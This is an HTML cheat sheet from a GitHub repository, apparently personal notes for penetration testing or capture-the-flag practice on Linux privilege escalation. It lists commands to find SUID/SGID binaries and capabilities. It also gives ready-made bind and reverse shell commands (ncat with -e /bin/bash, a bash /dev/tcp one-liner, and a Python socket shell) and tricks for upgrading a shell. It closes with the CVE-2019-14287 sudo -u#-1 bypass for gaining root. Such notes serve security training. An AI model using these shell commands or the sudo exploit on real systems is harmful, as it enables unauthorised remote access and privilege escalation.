-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathSUID.html
71 lines (68 loc) · 12.8 KB
/
SUID.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<!DOCTYPE HTML>
<html>
<head>
<title>SUIDs</title>
<title></title>
<title></title>
<title></title>
</head>
<body>
<p style="text-align: left;"><strong><span style="color: rgb(0, 0, 0); font-size: 30px;"><u><span style="background-color: rgb(251, 160, 38);">GTFO Bins_________________________________________</span></u></span></strong></p>
<p><span style="font-size: 20px;"><a href="https://gtfobins.github.io/">https://gtfobins.github.io/</a></span></p>
<p><span style="font-size: 20px;"><br></span></p>
<p style="text-align: left;"><span style="color: rgb(0, 0, 0); font-size: 30px;"><strong><u><span style="background-color: rgb(147, 101, 184);">Find SUIDs_________________________________________</span></u></strong></span></p>
<p><span style="font-size: 24px;"><strong>how to find another users capabilities or sudo permissions?</strong></span></p>
<p><span style="font-size: 24px;"><em>find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null</em></span></p>
<p><span style="font-size: 24px;"><em>find / - user <name> -perm -4000 2>/dev/null</em></span></p>
<p><span style="font-size: 24px;"><em>find / -perm -u=s -type f 2>/dev/null</em></span></p>
<p><span style="font-size: 24px;"><strong>SGID</strong></span></p>
<p><span style="font-size: 24px;"><em>find / -perm /2000</em></span></p>
<p><span style="font-size: 24px;"><strong>Both SUID and SGID</strong></span></p>
<p><span style="font-size: 24px;"><em>find / -perm /6000</em></span></p>
<p><strong><span style="font-size: 24px;">Capabilities</span></strong></p>
<p><span style="font-size: 24px;"><em>getcap -r / 2>/dev/null</em></span></p>
<p style='font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial; box-sizing: border-box; margin-top: 24px; margin-bottom: 16px; font-weight: 600; font-size: 1.5em; line-height: 1; padding-bottom: 0.3em; border-bottom: 1px solid var(--color-border-secondary); color: rgb(36, 41, 46); font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; background-color: rgb(255, 255, 255);'><span style='font-family: "Times New Roman", Times, serif; font-size: 30px;'><strong><u><span style="color: rgb(0, 0, 0); background-color: rgb(65, 168, 95);">Shells______________________________________________</span></u></strong></span></p>
<p style='font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial; box-sizing: border-box; margin-top: 24px; margin-bottom: 16px; font-weight: 600; font-size: 1.5em; line-height: 1; padding-bottom: 0.3em; border-bottom: 1px solid var(--color-border-secondary); color: rgb(36, 41, 46); font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; background-color: rgb(255, 255, 255);'><span style="font-size: 24px;"><span style="font-family: 'Times New Roman', Times, serif;"><a aria-hidden="true" class="anchor" href="https://github.com/NavKang/NavKang/blob/gh-pages/shells.md#start-bind-shell-on-victim" style="box-sizing: border-box; background-color: transparent; color: var(--color-text-link); text-decoration: none; float: left; padding-right: 4px; margin-left: -20px; line-height: 1;"></a>Start bind shell (on victim):</span></span></p>
<p><span style="font-size: 24px;"><span style="font-family: 'Times New Roman', Times, serif;"><em>ncat -l -p PORT -e "/bin/bash -i"</em></span></span></p>
<p style='font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial; box-sizing: border-box; margin-top: 24px; margin-bottom: 16px; font-weight: 600; line-height: 1.25; color: rgb(36, 41, 46); font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; background-color: rgb(255, 255, 255);'><span style="font-size: 24px;"><span style="font-family: 'Times New Roman', Times, serif;"><a aria-hidden="true" class="anchor" href="https://github.com/NavKang/NavKang/blob/gh-pages/shells.md#connect-to-bind-shell-on-attacker" style="box-sizing: border-box; background-color: transparent; color: var(--color-text-link); text-decoration: none; float: left; padding-right: 4px; margin-left: -20px; line-height: 1;"></a>Connect to bind shell (on attacker):</span></span></p>
<p><span style="font-size: 24px;"><span style="font-family: 'Times New Roman', Times, serif;"><em>ncat --ip-- --port--</em></span></span></p>
<p style='font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial; box-sizing: border-box; margin-top: 24px; margin-bottom: 16px; font-weight: 600; line-height: 1.25; color: rgb(36, 41, 46); font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; background-color: rgb(255, 255, 255);'><span style="font-size: 24px;"><span style="font-family: 'Times New Roman', Times, serif;">Listen for reverse shell (on attacker):</span></span></p>
<p><span style="font-size: 24px;"><span style="font-family: 'Times New Roman', Times, serif;"><em>ncat -l -p PORT</em></span></span></p>
<p style='font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial; box-sizing: border-box; margin-top: 24px; margin-bottom: 16px; font-weight: 600; line-height: 1.25; color: rgb(36, 41, 46); font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji"; background-color: rgb(255, 255, 255);'><span style="font-size: 24px;"><span style="font-family: 'Times New Roman', Times, serif;">Start reverse shell (on victim):</span></span></p>
<p><span style="font-size: 24px;"><span style="font-family: 'Times New Roman', Times, serif;"><em>ncat -e "/bin/bash -i" IPaddr</em></span></span></p>
<p><span style="font-size: 24px;"><strong>upgrade shell</strong></span></p>
<p><span style="font-size: 24px;"><em>python -c 'import pty; pty.spawn("/bin/bash")'</em></span></p>
<p><span style="font-size: 24px;"><em>SHELL=/bin/bash script -q /dev/null</em></span></p>
<p><span style="font-size: 24px;"><strong>Reverse Shell</strong></span></p>
<p><span style="font-size: 24px;"><em>bash -c "bash -i >& /dev/tcp/(tun0 ip add)/4444 0>&1" - Useful if you find a .sh file on remote system</em></span></p>
<p><span style="font-size: 24px;"><strong>Python Reverse Shell</strong></span></p>
<p><span style="font-size: 24px;"><em>python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</em></span></p>
<p><span style="font-size: 24px;"><strong><u><span style="color: rgb(65, 168, 95);">Useful site for upgrading shells:</span></u></strong></span></p>
<p><a href="https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys"><span style="font-size: 24px;">https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys</span></a></p>
<p><br></p>
<p style="text-align: left;"><strong><span style="font-size: 30px; color: rgb(0, 0, 0);"><u><span style="background-color: rgb(250, 197, 28);">Enumeration & Priv Esc Scripts_______________________</span></u></span></strong></p>
<p><span style="font-size: 24px;">LinENUM script: <a href="https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh">Download a local copy of LinEnum</a></span></p>
<p><span style="font-size: 24px;">Linpeas script: <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS">Download a copy of Linpeas </a></span></p>
<p><span style="font-size: 24px;">lse.sh script: <a href="https://github.com/diego-treitos/linux-smart-enumeration">Download a copy of lse</a> </span></p>
<p><br></p>
<p style="text-align: left;"><span style="font-size: 30px;"><strong><u><span style="color: rgb(239, 239, 239); background-color: rgb(41, 105, 176);">Sudo Information: Usage and Vulnerability_______________</span></u></strong></span></p>
<p><span style="font-size: 24px;"><strong>Usage:</strong></span></p>
<ul>
<li><span style="font-size: 24px;">normally it is:<em> </em><strong><em>Sudo <command></em></strong></span></li>
<li><span style="font-size: 24px;">you can specify manually: <strong><em>sudo -u#<id> <command></em></strong></span></li>
<li><span style="font-size: 24px;">the config file is <strong>/etc/sudoers</strong></span></li>
<li><span style="font-size: 24px;">if you wish to edit then use: <strong>sudo visudo</strong></span></li>
</ul>
<p><span style="font-size: 24px;"><strong>What is the vulnerability:</strong></span></p>
<p><span style="font-size: 24px;">Sudo vulnerability found in version < 1.8.28 - <span style='font-size: 24px; line-height: 107%; font-family: "Times New Roman", Times, serif; color: rgb(33, 37, 41);'>CVE-2019-14287</span><span style='font-size:15px;line-height:107%;font-family:"Courier New";color:#212529;'> </span></span></p>
<p><span style='font-family: "Times New Roman", Times, serif; font-size: 24px;'>issue stems from the following entry in sudoers:</span></p>
<p><span style="font-size: 24px;"><span style="font-family: 'Times New Roman', Times, serif;"><strong>{user name} ALL=(ALL:!root_ NOPASSWD: ALL</strong></span></span></p>
<p style='margin-right:0cm;margin-left:0cm;font-size:15px;font-family:"Calibri",sans-serif;margin-top:0cm;margin-bottom:8.0pt;line-height:107%;background:white;'><span style='font-family: "Times New Roman", Times, serif; font-size: 24px;'>this would prevent anyone running as superuser/admin, so<strong> sudo -u#0</strong> will not work, however, <strong>sudo -u#-1</strong> will work.</span></p>
<p style='margin-right:0cm;margin-left:0cm;font-size:15px;font-family:"Calibri",sans-serif;margin-top:0cm;margin-bottom:8.0pt;line-height:107%;background:white;'><br></p>
<p style='margin-right:0cm;margin-left:0cm;font-size:15px;font-family:"Calibri",sans-serif;margin-top:0cm;margin-bottom:8.0pt;line-height:107%;background:white;'><span style='font-family: "Times New Roman", Times, serif; font-size: 24px;'><strong><em>sudo -u#-1</em> </strong></span><span style='font-family: "Times New Roman", Times, serif; font-size: 18px;'>(unsigned equivalent <span style='line-height: 107%; font-family: "Times New Roman", Times, serif; color: rgb(33, 37, 41);'>4294967295</span></span><span style='font-family: "Times New Roman", Times, serif; font-size: 24px;'><span style='line-height: 107%; font-family: "Courier New"; color: rgb(33, 37, 41);'>)</span><span style='line-height: 107%; font-family: "Times New Roman", Times, serif; color: rgb(33, 37, 41);'><strong>(command)</strong></span></span></p>
<p style='margin-right:0cm;margin-left:0cm;font-size:15px;font-family:"Calibri",sans-serif;margin-top:0cm;margin-bottom:8.0pt;line-height:107%;background:white;'><br></p>
<p style='margin-right:0cm;margin-left:0cm;font-size:15px;font-family:"Calibri",sans-serif;margin-top:0cm;margin-bottom:8.0pt;line-height:107%;background:white;'><span style='font-family: "Times New Roman", Times, serif; font-size: 24px;'><span style="line-height: 107%; color: rgb(33, 37, 41);">Note: only works if you have non root permission</span></span></p>
<p><br></p>
<p><br></p>
</body>
</html>